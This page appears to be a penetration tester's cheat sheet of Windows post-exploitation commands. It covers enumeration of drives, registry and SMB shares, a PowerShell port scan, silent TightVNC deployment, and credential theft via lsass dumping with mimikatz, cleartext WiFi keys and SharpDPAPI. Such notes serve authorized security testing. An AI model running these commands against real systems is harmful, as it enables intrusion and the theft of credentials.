xct's notes
Search…
Windows

General

Check for additional drives

1
get-psdrive //powershell
2
show_mount // meterpreter
3
wmic logicaldisk get name|caption //wmic
4
Seatbelt MappedDrives // seatbelt
Copied!

List installed programs

1
reg query HKEY_LOCAL_MACHINE\SOFTWARE
2
reg query HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall
Copied!

Check linux subsystem

1
C:\Users\<name>\AppData\Local\Packages\CanonicalGroup...
Copied!

Search writeable directories

1
dir /a-r-d /s /b
Copied!

Search files by name

1
dir /s *foo*
Copied!

Search Files by content

1
findstr /s /i <needle> *.*
Copied!

Search Files by owner

1
dir c:\*.* /S /Q|FIND /i "owner"
Copied!

Search files in meterpreter

1
search -f *.<ext>`
Copied!

Search for alternate data streams (ads)

1
dir /s /R /a
Copied!

Check named pipes in PowerShell

1
[System.IO.Directory]::GetFiles("\\.\\pipe\\")
Copied!

Grep file contents in PowerShell

1
Select-String -Path <path> -Pattern <pattern> | out-host -paging
Copied!

Enumerate SMB

1
smbmap -R -H \\<ip>
2
smbclient -L \\<ip> -N
3
smbclient \\<ip>\share -U <user>
4
smbget -R <ip>
Copied!

Grant permissions with icacls

1
icacls <filename> /grant <username>(OI)(CI)F /T
Copied!

Search registry

1
reg query HKLM /s | findstr /i <item>
2
reg query HKCU /s | findstr /i <item>
3
reg query HKLM /f <item> /t REG_SZ /s
4
reg query HKCU /f <item> /t REG_SZ /s
Copied!
1
netsh wlan show profile <name> key=clear
Copied!

PowerShell port scan

1
0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect("<ip>",$_)) "Port $_ is open!"} 2>$null
Copied!

Get User SID

1
[wmi] "Win32_userAccount.Domain='client',Name='Administrator'"
Copied!

Deploy TightVNC

1
msiexec /i "tightvnc.msi" /quiet /norestart ADDLOCAL="Server,Viewer" VIEWER_ASSOCIATE_VNC_EXTENSION=1 SERVER_REGISTER_AS_SERVICE=1 SERVER_ADD_FIREWALL_EXCEPTION=1 VIEWER_ADD_FIREWALL_EXCEPTION=1 SERVER_ALLOW_SAS=1 SET_USEVNCAUTHENTICATION=1 VALUE_OF_USEVNCAUTHENTICATION=1 SET_PASSWORD=1 VALUE_OF_PASSWORD=PASSWORD SET_USECONTROLAUTHENTICATION=1 VALUE_OF_USECONTROLAUTHENTICATION=1 SET_CONTROLPASSWORD=1 VALUE_OF_CONTROLPASSWORD=PASSWORD
Copied!

Grep Registry for Keywords:

1
reg query HKLM /s /f <keyword> (try HKLM/HKCU)
Copied!

Find Files by Date

1
forfiles /P C:\ /S /D 10/24/2020 /C "cmd /c echo @PATH"
Copied!

Bypass Execution Policy (for domain users) by changing registry as local administrator

1
HKLM:\Software\Policies\Microsoft\Windows\PowerShell # change value to bypass
Copied!

Useful Commands in Rpcclient

1
rpcclient -U <user> <ip>
2
lookupnames <name>
3
lookupsids <sid>
Copied!

Dumping Processes

1
procdump.exe -accepteula -ma <pid>
Copied!
We can also use a short custom program to avoid using procdump.
If we dump lsass, this dump can be read using mimikatz:
1
sekurlsa::minidump lsass.dmp
2
sekurlsa::logonpasswords
Copied!

Credentials

Check for stored credentials:
1
cmdkey /list
Copied!

Company Files

This lead to success on numerous occasions. While not technical make sure you look at the files that are on the system. This includes configuration backups, documents, notes, technical documentation and more.

Invoke-PrivescCheck

Great Script to collection information about the host and possible EoP Paths.

Seatbelt

Good Host Enumeration Tool: https://github.com/GhostPack/Seatbelt.
1
Seatbelt -group=all -full
Copied!

SharpDPAPI

Get Passwords from Chrome & Windows via https://github.com/GhostPack/SharpDPAPI.
1
SharpDPAPI triage
Copied!

Check for running services

1
sc query
2
sc query <>
3
sc qc <>
4
reg query HKLM\SYSTEM\CurrentControlSet\Services
Copied!

SMBClient

List Shares

1
smbclient -L \\<ip> -U anonymous
Copied!

Connect to Share

Without credentials:
1
smbclient \\server\\sharename -U "" -N
Copied!
With credentials:
1
smbclient \\server\\sharename -U domain\user
Copied!

Other

Usually you want to run the scripts/tools from the Privilege Escalation Section. Other than that these are interesting as well:
  • Screenshot
  • Keylogger
Last modified 9mo ago